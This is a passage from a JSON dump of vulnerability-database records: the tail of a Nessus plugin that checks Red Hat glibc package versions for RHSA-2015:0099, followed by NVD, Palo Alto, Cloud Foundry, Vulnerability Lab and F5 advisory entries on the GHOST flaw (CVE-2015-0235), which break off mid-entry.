script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = eregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^(5\\.6|5\\.9|6)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.6 / 5.9 / 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2015:0099\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{ sp = get_kb_item(\"Host/RedHat/minor_release\");\n if (isnull(sp)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\n\n flag = 0;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", reference:\"glibc-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"glibc-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i686\", reference:\"glibc-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"glibc-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"glibc-common-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"i386\", reference:\"glibc-common-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"s390x\", reference:\"glibc-common-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"glibc-common-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"x86_64\", reference:\"glibc-common-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", reference:\"glibc-debuginfo-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"glibc-debuginfo-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i686\", reference:\"glibc-debuginfo-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"glibc-debuginfo-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"glibc-debuginfo-common-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"i386\", reference:\"glibc-debuginfo-common-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", reference:\"glibc-devel-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"glibc-devel-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"glibc-devel-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"glibc-headers-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"i386\", reference:\"glibc-headers-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"s390x\", reference:\"glibc-headers-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"glibc-headers-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"x86_64\", reference:\"glibc-headers-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"glibc-utils-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"i386\", reference:\"glibc-utils-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"s390x\", reference:\"glibc-utils-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"glibc-utils-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"x86_64\", reference:\"glibc-utils-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"nscd-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"i386\", reference:\"nscd-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"s390x\", reference:\"nscd-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"nscd-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"x86_64\", reference:\"nscd-2.5-107.el5_9.8\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"4\", reference:\"glibc-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", reference:\"glibc-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"i686\", reference:\"glibc-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"i686\", reference:\"glibc-common-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"i686\", reference:\"glibc-common-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"s390x\", reference:\"glibc-common-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"s390x\", reference:\"glibc-common-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"x86_64\", reference:\"glibc-common-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-common-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"x86_64\", reference:\"glibc-common-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", reference:\"glibc-debuginfo-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", reference:\"glibc-debuginfo-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"i686\", reference:\"glibc-debuginfo-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-debuginfo-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", reference:\"glibc-debuginfo-common-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", reference:\"glibc-debuginfo-common-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"i686\", reference:\"glibc-debuginfo-common-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-debuginfo-common-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", reference:\"glibc-devel-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", reference:\"glibc-devel-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"i686\", reference:\"glibc-devel-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-devel-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"i686\", reference:\"glibc-headers-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"i686\", reference:\"glibc-headers-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"s390x\", reference:\"glibc-headers-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"s390x\", reference:\"glibc-headers-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"x86_64\", reference:\"glibc-headers-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-headers-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"x86_64\", reference:\"glibc-headers-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", reference:\"glibc-static-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", reference:\"glibc-static-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"i686\", reference:\"glibc-static-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-static-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"i686\", reference:\"glibc-utils-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"i686\", reference:\"glibc-utils-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"s390x\", reference:\"glibc-utils-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"s390x\", reference:\"glibc-utils-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"x86_64\", reference:\"glibc-utils-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-utils-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"x86_64\", reference:\"glibc-utils-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"i686\", reference:\"nscd-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"i686\", reference:\"nscd-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"s390x\", reference:\"nscd-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"s390x\", reference:\"nscd-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"x86_64\", reference:\"nscd-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"nscd-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"x86_64\", reference:\"nscd-2.12-1.132.el6_5.5\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc / glibc-common / glibc-debuginfo / glibc-debuginfo-common / etc\");\n }\n}\n", "naslFamily": "Red Hat Local Security Checks", "pluginID": "81068", "cpe": ["p-cpe:/a:redhat:enterprise_linux:glibc-static", "cpe:/o:redhat:enterprise_linux:6.5", "p-cpe:/a:redhat:enterprise_linux:glibc-utils", "cpe:/o:redhat:enterprise_linux:5.9", "p-cpe:/a:redhat:enterprise_linux:glibc", "cpe:/o:redhat:enterprise_linux:6.4", "p-cpe:/a:redhat:enterprise_linux:glibc-common", "p-cpe:/a:redhat:enterprise_linux:glibc-devel", "p-cpe:/a:redhat:enterprise_linux:nscd", "cpe:/o:redhat:enterprise_linux:5.6", "cpe:/o:redhat:enterprise_linux:6.2", "p-cpe:/a:redhat:enterprise_linux:glibc-headers", "cpe:/o:redhat:enterprise_linux:6", "p-cpe:/a:redhat:enterprise_linux:glibc-debuginfo", "p-cpe:/a:redhat:enterprise_linux:glibc-debuginfo-common"], "scheme": null}
{"cve": [{"lastseen": "2019-06-15T10:27:39", "bulletinFamily": "NVD", "description": "Heap-based buffer overflow in the __nss_hostname_digits_dots function in glibc 2.2, and other 2.x versions before 2.18, allows context-dependent attackers to execute arbitrary code via vectors related to the (1) gethostbyname or (2) gethostbyname2 function, aka \"GHOST.\"", "modified": "2019-06-13T21:29:00", "id": "CVE-2015-0235", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0235", "published": "2015-01-28T19:59:00", "title": "CVE-2015-0235", "type": "cve", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "paloalto": [{"lastseen": "2019-10-16T04:32:18", "bulletinFamily": "software", "description": "The open source library \u201cglibc\u201d has been found to contain a recently discovered vulnerability (CVE-2015-0235, commonly referred to as \u201cGHOST\u201d) that has been demonstrated to enable remote code execution in some software. Palo Alto Networks software makes use of the vulnerable library, however there is no known exploitable condition in PAN-OS software enabled by this vulnerability at the time of this advisory. An update to PAN-OS will be made available that addresses CVE-2015-0235 in a regularly scheduled software maintenance update. (Ref # 74443)\n", "modified": "2015-06-04T00:00:00", "published": "2015-02-02T00:00:00", "id": "PAN-SA-2015-0002", "href": "https://securityadvisories.paloaltonetworks.com/Home/Detail/29", "title": "GHOST: glibc vulnerability (CVE-2015-0235)", "type": "paloalto", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cloudfoundry": [{"lastseen": "2019-05-29T18:32:48", "bulletinFamily": "software", "description": "CVE-2015-0235 \u2013 GHOST\n\n# \n\nCritical\n\n# Vendor\n\nCanonical, Red Hat\n\n# Versions Affected\n\n * Ubuntu 10.04 (Lucid), 12.04 (Precise), CentOS 6. \n\n# Description\n\nA heap-based buffer overflow was found in __nss_hostname_digits_dots(), which is used by the gethostbyname() and gethostbyname2() glibc function call. A remote attacker could use this flaw to execute arbitrary code with the permissions of the user running the application.\n\n# Affected Products and Versions\n\n_Severity is critical unless otherwise noted. \n_\n\n * All versions of Cloud Foundry BOSH stemcells running Ubuntu 10.04 (Lucid), 12.04 (Precise), and CentOS. \n * All versions of Cloud Foundry Runtime through v196 \n\n# Unaffected Products\n\n * Ubuntu 14.04 (Trusty) stemcells are **not** vulnerable. \n * Buildpacks for ruby, php, nodejs, goloang and java are **not** vulnerable. \n\n# Mitigation\n\nUsers of affected versions should apply the following mitigation:\n\n * The Cloud Foundry project recommends that Ubuntu 10.04 (Lucid) BOSH Stemcells be upgraded to the Ubuntu 14.04 (Trusty) Stemcells. \n * The Cloud Foundry BOSH team has released stemcell 2829 for CentOS 6 which uses patched CentOS packages. The Cloud Foundry project recommends that CentOS 6 stemcell users upgrade to CentOS stemcell 2829. \n * The Cloud Foundry Runtime team has completed on a patch release of Ubuntu 10.04 (Lucid) root file system which is now available in Runtime v197. Applications running on Cloud Foundry Runtime that statically link to glibc need to be restaged after upgrading. \n * If an application or buildpack statically links to glibc it must restage after the runtime upgrade. \n * Binaries included in a custom buildpack or application must be scanned and patched as needed by the application developer responsible for those assets. \n\n# Credit\n\nQualys and Alexander Peslyak of the Openwall Project\n\n# References\n\n * <https://www.vmware.com/support/policies/security_response>\n * <http://www.openwall.com/lists/oss-security/2015/01/27/9>\n * <http://boshartifacts.cloudfoundry.org/file_collections?type=stemcells>\n * <http://github.com/cloudfoundry/cf-release>\n", "modified": "2015-01-28T00:00:00", "published": "2015-01-28T00:00:00", "id": "CFOUNDRY:63DB340A742A21A8EFB20A9452A0EDD2", "href": "https://www.cloudfoundry.org/blog/cve-2015-0235/", "title": "CVE-2015-0235 - GHOST | Cloud Foundry", "type": "cloudfoundry", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "vulnerlab": [{"lastseen": "2019-05-29T17:28:54", "bulletinFamily": "exploit", "description": "", "modified": "2015-01-30T00:00:00", "published": "2015-01-30T00:00:00", "id": "VULNERLAB:1430", "href": "http://www.vulnerability-lab.com/get_content.php?id=1430", "title": "Glibc Ghost Vulnerability (CVE-2015-0235) - How to Secure", "type": "vulnerlab", "sourceData": "Document Title:\r\n===============\r\nGlibc Ghost Vulnerability (CVE-2015-0235) - How to Secure\r\n\r\n\r\nReferences:\r\n===========\r\nhttp://www.vulnerability-lab.com/get_content.php?id=1430\r\n\r\nDownload: http://www.vulnerability-lab.com/resources/documents/1430.pdf\r\n\r\n\r\n\r\nRelease Date:\r\n=============\r\n2015-01-30\r\n\r\n\r\nVulnerability Laboratory ID (VL-ID):\r\n====================================\r\n1430\r\n\r\n\r\nDiscovery Status:\r\n=================\r\nPublished\r\n\r\n\r\nExploitation Technique:\r\n=======================\r\nReport\r\n\r\n\r\nSeverity Level:\r\n===============\r\nHigh\r\n\r\n\r\nTechnical Details & Description:\r\n================================\r\nThe GNU C Library or glibc is an implementation of the standard C library and a core part of the Linux operating system. Without this library a \r\nLinux system will not function. The GHOST vulnerability is a serious weakness in the Linux glibc library. It allows attackers to remotely take complete control \r\nof the victim system without having any prior knowledge of system credentials. CVE-2015-0235 has been assigned to this issue.\r\n\r\nThe paper explains the vulnerability in the linux system and demonstrates how to prevent a local or remote compromise.\r\n\r\n\r\nCredits & Authors:\r\n==================\r\nRajivarnan R. [Security Researcher] - Akati Consulting Pvt Ltd \r\n\r\n\r\nDisclaimer & Information:\r\n=========================\r\nThe information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed \r\nor implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable \r\nin any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab \r\nor its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for \r\nconsequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, \r\npolicies, deface websites, hack into databases or trade with fraud/stolen material.\r\n\r\nDomains: www.vulnerability-lab.com \t- www.vuln-lab.com\t\t\t \t\t- www.evolution-sec.com\r\nContact: admin@vulnerability-lab.com \t- research@vulnerability-lab.com \t \t\t- admin@evolution-sec.com\r\nSection: magazine.vulnerability-db.com\t- vulnerability-lab.com/contact.php\t\t \t- evolution-sec.com/contact\r\nSocial:\t twitter.com/#!/vuln_lab \t\t- facebook.com/VulnerabilityLab \t \t\t- youtube.com/user/vulnerability0lab\r\nFeeds:\t vulnerability-lab.com/rss/rss.php\t- vulnerability-lab.com/rss/rss_upcoming.php \t\t- vulnerability-lab.com/rss/rss_news.php\r\nPrograms: vulnerability-lab.com/submit.php \t- vulnerability-lab.com/list-of-bug-bounty-programs.php\t- vulnerability-lab.com/register/\r\n\r\nAny modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to \r\nelectronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by \r\nVulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website \r\nis trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact \r\n(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.\r\n\r\n\t\t\t\tCopyright \u00a9 2015 | Vulnerability Laboratory - [Evolution Security GmbH]\u2122\r\n\r\n\r\n\r\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "f5": [{"lastseen": "2016-11-30T01:27:33", "bulletinFamily": "software", "description": "Vulnerability Recommended Actions\n\nIf the previous table lists a version in the **Versions known to be not vulnerable** column, you can eliminate this vulnerability by upgrading to the listed version. If the listed version is older than the version you are currently running, or if the table does not list any version in the column, then no upgrade candidate currently exists. F5 is working to provide a patch for this issue, and will update this article as soon as a patch becomes available.\n\nTo mitigate this vulnerability, you should only permit access to F5 products over a secure network and limit login access to trusted users. For additional information, refer to SOL13092: Overview of securing access to the BIG-IP system.\n\nFor information about using the BIG-IP ASM system and iRules to mitigate various GHOST exploits, refer to the\u00c2 [GHOST Vulnerability (CVE-2015-0235)](<https://devcentral.f5.com/articles/ghost-vulnerability-cve-2015-0235>) DevCentral article. \n \n**Note: **A DevCentral login is required to access this content.\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL4918: Overview of the F5 critical issue hotfix policy\n * SOL167: Downloading software and firmware from F5\n * SOL7312: Overview of the management port\n", "modified": "2016-08-17T00:00:00", "published": "2015-01-27T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/16000/000/sol16057.html", "id": "SOL16057", "title": "SOL16057 - GHOST: glibc gethostbyname buffer overflow vulnerability CVE-2015-0235", "type": "f5", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-06-20T16:42:29", "bulletinFamily": "software", "description": "\nF5 Product Development has assigned ID 503237 (BIG-IP), ID 505635 (BIG-IQ), ID 505643 (Enterprise Manager), and ID 476571 (ARX) to this vulnerability. Additionally, [BIG-IP iHealth](<http://www.f5.com/support/support-tools/big-ip-ihealth>) may list Heuristic H503301 on the **Diagnostics **> **Identified** >** High **screen.\n\nTo determine if your product and version have been evaluated for this vulnerability, refer to the **Applies to (see versions) **box. To determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table.\n\nProduct | Versions known to be vulnerable | Versions known to be not vulnerable | Vulnerable component or feature \n---|---|---|--- \nBIG-IP LTM | 11.6.0* \n11.0.0 - 11.5.1* \n10.1.0 - 10.2.4* | 12.0.0 \n11.6.0 HF4 \n11.5.2 - 11.5.5 \n11.5.1 HF8 \n11.5.0 HF7 \n11.4.1 HF8 \n11.4.0 HF10 \n11.2.1 HF14 \n10.2.4 HF11 | glibc \nBIG-IP AAM | 11.6.0* \n11.4.0 - 11.5.1* | 12.0.0 \n11.6.0 HF4 \n11.5.2 - 11.5.5 \n11.5.1 HF8 \n11.5.0 HF7 \n11.4.1 HF8 \n11.4.0 HF10 | glibc \nBIG-IP AFM | 11.6.0* \n11.3.0 - 11.5.1* | 12.0.0 \n11.6.0 HF4 \n11.5.2 - 11.5.5 \n11.5.1 HF8 \n11.5.0 HF7 \n11.4.1 HF8 \n11.4.0 HF10 | glibc \nBIG-IP Analytics | 11.6.0* \n11.0.0 - 11.5.1* | 12.0.0 \n11.6.0 HF4 \n11.5.2 - 11.5.5 \n11.5.1 HF8 \n11.5.0 HF7 \n11.4.1 HF8 \n11.4.0 HF10 \n11.2.1 HF14 | glibc \nBIG-IP APM | 11.6.0* \n11.0.0 - 11.5.1* \n10.1.0 - 10.2.4* | 12.0.0 \n11.6.0 HF4 \n11.5.2 - 11.5.5 \n11.5.1 HF8 \n11.5.0 HF7 \n11.4.1 HF8 \n11.4.0 HF10 \n11.2.1 HF14 \n10.2.4 HF11 | glibc \nBIG-IP ASM | 11.6.0* \n11.0.0 - 11.5.1* \n10.1.0 - 10.2.4* | 12.0.0 \n11.6.0 HF4 \n11.5.2 - 11.5.5 \n11.5.1 HF8 \n11.5.0 HF7 \n11.4.1 HF8 \n11.4.0 HF10 \n11.2.1 HF14 \n10.2.4 HF11 | glibc \nBIG-IP DNS | None | 12.0.0 | None \nBIG-IP Edge Gateway | 11.0.0 - 11.3.0* \n10.1.0 - 10.2.4* | 11.2.1 HF14 \n10.2.4 HF11 | glibc \nBIG-IP GTM | 11.6.0* \n11.0.0 - 11.5.1* \n10.1.0 - 10.2.4* | 11.6.0 HF4 \n11.5.2 - 11.5.5 \n11.5.1 HF8 \n11.5.0 HF7 \n11.4.1 HF8 \n11.4.0 HF10 \n11.2.1 HF14 \n10.2.4 HF11 | glibc \nBIG-IP Link Controller | 11.6.0* \n11.0.0 - 11.5.1* \n10.1.0 - 10.2.4* | 12.0.0 \n11.6.0 HF4 \n11.5.2 - 11.5.5 \n11.5.1 HF8 \n11.5.0 HF7 \n11.4.1 HF8 \n11.4.0 HF10 \n11.2.1 HF14 \n10.2.4 HF11 | glibc \nBIG-IP PEM | 11.6.0* \n11.3.0 - 11.5.1* | 12.0.0 \n11.6.0 HF4 \n11.5.2 - 11.5.5 \n11.5.1 HF8 \n11.5.0 HF7 \n11.4.1 HF8 \n11.4.0 HF10 | glibc \nBIG-IP PSM | 11.0.0 - 11.4.1* \n10.1.0 - 10.2.4* | 11.4.1 HF8 \n11.4.0 HF10 \n11.2.1 HF14 \n10.2.4 HF11 | glibc \nBIG-IP WebAccelerator | 11.0.0 - 11.3.0* \n10.1.0 - 10.2.4* | 11.2.1 HF14 \n10.2.4 HF11 | glibc \nBIG-IP WOM | 11.0.0 - 11.3.0* \n10.1.0 - 10.2.4* | 11.2.1 HF14 \n10.2.4 HF11 | glibc \nARX | 6.0.0 - 6.4.0* | None | glibc \nEnterprise Manager | 3.0.0 - 3.1.1* \n2.1.0 - 2.3.0* | 3.1.1 HF5 | glibc \nFirePass | None | 7.0.0 \n6.0.0 - 6.1.0 | None \nBIG-IQ Cloud | 4.0.0 - 4.5.0* | 4.5.0 HF1 \n4.4.0 HF2 | glibc \nBIG-IQ Device | 4.2.0 - 4.5.0* | 4.5.0 HF1 \n4.4.0 HF2 | glibc \nBIG-IQ Security | 4.0.0 - 4.5.0* | 4.5.0 HF1 \n4.4.0 HF2 | glibc \nBIG-IQ ADC | 4.5.0* | 4.5.0 HF1 | glibc \nLineRate | None | 2.2.0 - 2.5.0 \n1.6.0 - 1.6.4 | None \nTraffix-SDC | 4.1.0 \n4.0.0 - 4.0.5 \n3.5.2 \n3.4.0 - 3.4.1 \n3.3.2 | None | glibc \nWebSafe | None | 1.0.0 | None \nBIG-IP Edge Clients for Android | None | 2.0.0 - 2.0.5 | None \nBIG-IP Edge Clients for Apple iOS | None | 2.0.0 - 2.0.2 \n1.0.5 - 1.0.6 | None \nBIG-IP Edge Clients for Linux | None | 6035.x - 7110.x | None \nBIG-IP Edge Clients for MAC OS X | None | 6035.x - 7110.x | None \nBIG-IP Edge Clients for Windows | None | 6035.x - 7110.x | None \nBIG-IP Edge Clients Windows Phone 8.1 | None | 1.0.0.x | None \nBIG-IP Edge Portal for Android | None | 1.0.0 - 1.0.2 | None \nBIG-IP Edge Portal for Apple iOS | None | 1.0.0 - 1.0.3 | None \nFirePass Client | None | 5520.x - 6032.x | None \n \n* F5 has determined that these products contain vulnerable versions of glibc, and the vulnerable function is used in the product; however, at this time, F5 does not have evidence of any remote exploit vectors for this vulnerability. \n\nIf the previous table lists a version in the **Versions known to be not vulnerable** column, you can eliminate this vulnerability by upgrading to the listed version. If the listed version is older than the version you are currently running, or if the table does not list any version in the column, then no upgrade candidate currently exists.\n\nMitigation\n\nTo mitigate this vulnerability, you should only permit access to F5 products over a secure network and limit login access to trusted users. For additional information, refer to [K13092: Overview of securing access to the BIG-IP 